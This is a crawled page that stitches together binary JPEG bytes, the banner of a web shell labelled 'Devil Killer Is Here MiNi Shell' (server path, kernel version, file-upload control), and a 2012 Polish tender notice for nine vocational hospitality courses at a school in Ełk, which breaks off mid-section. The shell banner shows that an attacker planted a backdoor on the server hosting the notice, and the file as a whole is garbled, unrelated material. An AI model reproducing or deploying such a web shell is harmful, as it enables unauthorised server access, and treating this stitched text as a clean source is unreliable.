JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121220/269473-N-2012.html

<p class="kh_header"><b>Ełk: Przeprowadzenie kursów dla uczniów i nauczycieli w ramach realizowanego projektu pod nazwą Lepszy start w przyszłość edukacyjno - zawodową uczniów -uczennic zespołu Szkół nr 6 im. Macieja Rataja w Ełku</b><br>
<b>Numer ogłoszenia: 269473 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ełcki , ul. Piłsudskiego 4, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6218300, faks 087 6218339.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów dla uczniów i nauczycieli w ramach realizowanego projektu pod nazwą Lepszy start w przyszłość edukacyjno - zawodową uczniów -uczennic zespołu Szkół nr 6 im. Macieja Rataja w Ełku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie 9 profesjonalnych kursów z zakresu gastronomii i hotelarstwa dla uczestników projektu Lepszy start w przyszłość edukacyjno - zawodową uczniów-uczennic Zespołu Szkół nr 6 im. Macieja Rataja w Ełku realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Zamówienie dzielone na 9 części. Szczegółowy opis zamówienia zawarty jest w SIWZ i opisie szczegółowym poszczególnych części w niniejszym ogłoszeniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1- załącznik nr 2 do SIWZ. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, co najmniej 3 kursów, szkoleń w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, dat wykonania, oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie. W celu potwierdzenia spełniania warunku proszę załączyć wypełniony załącznik nr 4 potwierdzony referencjami. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą dokumenty wg. metody spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1- załącznik nr 2 do SIWZ. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1- załącznik nr 2 do SIWZ. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1- załącznik nr 2 do SIWZ. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy przekazany w materiałach przetargowych, którego wzór stanowi załącznik nr 1 do niniejszej specyfikacji.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach :
a)	W przypadku zaistnienia niemożliwych do przewidzenia okoliczności uniemożliwiających terminowe wykonanie zamówienia, po wcześniejszym pisemnym uzyskaniu zgody Zamawiającego do uzgodnionego harmonogramu usług wprowadzone zostaną zmiany 
b)	Zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru wykonawcy
c)	Dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron umowy .
d)	Wprowadzenia lub zmiany podwykonawcy 
e)	Zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT)
f)	Zmiany w zakresie przedmiotu zamówienia jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa.
g)	Wynagrodzenie umowne może ulec zmianie w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_elcki/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół nr 6 im. Macieja Rataja w Ełku
ul. Kajki 4
19-300 Ełk
Sekretariat Szkoły, w godzinach od 7.00 do 15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2013 godzina 10:00, miejsce: Zespół Szkół nr 6 im. Macieja Rataja w Ełku
ul. Kajki 4
19-300 Ełk
Sekretariat Szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Lepszy start w przyszłość edukacyjno - zawodową uczniów-uczennic Zespołu Szkół nr 6 im. Macieja Rataja w Ełku  realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs barmański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - kurs barmański (30 godzin) - 14 uczniów + 2 nauczycieli,
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 30 % kursu
- zajęcia praktyczne - min. 70 % kursu
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić produkty, materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych certyfikatów / zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego,
g)	Wykonawca zobowiązany jest przeprowadzić kurs w oparciu o oryginalne produkty,  
h)	Wykonawca musi być członkiem lub posiadać rekomendację Stowarzyszenia Polskich Barmanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs baristy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - kurs baristy (II grupy po 20 godzin) - każda z grup 6 uczniów + 2 nauczycieli, 
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 30% kursu
- zajęcia praktyczne - min. 70 % 
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić produkty, materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego,
g)	Wykonawca musi być członkiem lub posiadać rekomendację Stowarzyszenia Baristów Polskich..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs z obsługi kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - kurs z obsługi kas fiskalnych (16 godzin) - 14 uczniów + 2 nauczycieli,
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 30 % kursu
- zajęcia praktyczne - min. 70 % 
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego, 
g)	Wykonawca zobowiązany jest przeprowadzić kurs praktyczny na własnym wyposażeniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs z aranżacji wnętrz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - kurs z aranżacji wnętrz (30 godzin) - 14 uczniów + 2 nauczycieli,
a) Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 30 % kursu
- zajęcia praktyczne - min. 70 % 
b) Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c) Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d) Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e) Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić  materiały i sprzęt niezbędne do należytego przeprowadzenia kursu. 
f) Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs z obsługi programu zarzadzajacego hotelem SOHO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - kurs z obsługi programu zarządzającego hotelem SOHO (30 godzin) - 14 uczniów + 2 nauczycieli,
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 10 % kursu
- zajęcia praktyczne - min. 90 % 
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
c)	Wykonawca w ramach realizacji zamówienia zobowiązany jest do przeprowadzenia na zakończenie kursu egzaminu wewnętrznego dla grupy kończącej kurs,
d)	Wykonawca zobowiązany jest zapewnić uczestnikom kursu materiały szkoleniowe, które staną się własnością kursantów,
e)	Wykonawca musi posiadać uprawnienia, zapewnić kadrę dydaktyczna posiadającą kwalifikacje i doświadczenie zawodowe odpowiednie do prowadzonego kursu oraz zapewnić materiały niezbędne do należytego przeprowadzenia kursu. Zamawiający udostępni 16 stanowisk komputerowych celem przeprowadzenia kursu
f)	Wykonawca zobowiązany jest prowadzić szczegółową dokumentację prowadzonych zajęć, w tym dzienniki zajęć zawierające w szczególności: listy obecności, wymiar godzin i tematy edukacyjne, rejestry wydanych zaświadczeń potwierdzających ukończenie kursu, oraz sporządzi arkusze przebiegu egzaminu wewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs recepcja hotelowa i standardy obsługi gościa hotelowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI - kurs recepcja hotelowa i standardy obsługi gościa hotelowego (16 godzin) - 14 uczniów + 2 nauczycieli, 
a)	Program szkolenia przedstawiony Zamawiającemu wraz z ofertą powinien obejmować:
- zajęcia teoretyczne - max. 30 % kursu
- zajęcia praktyczne - min. 70 % 
b)	Szkolenie musi być przeprowadzone na terenie Zespołu Szkół nr 6 w Ełku w podanym terminie od stycznia do czerwca 2013,
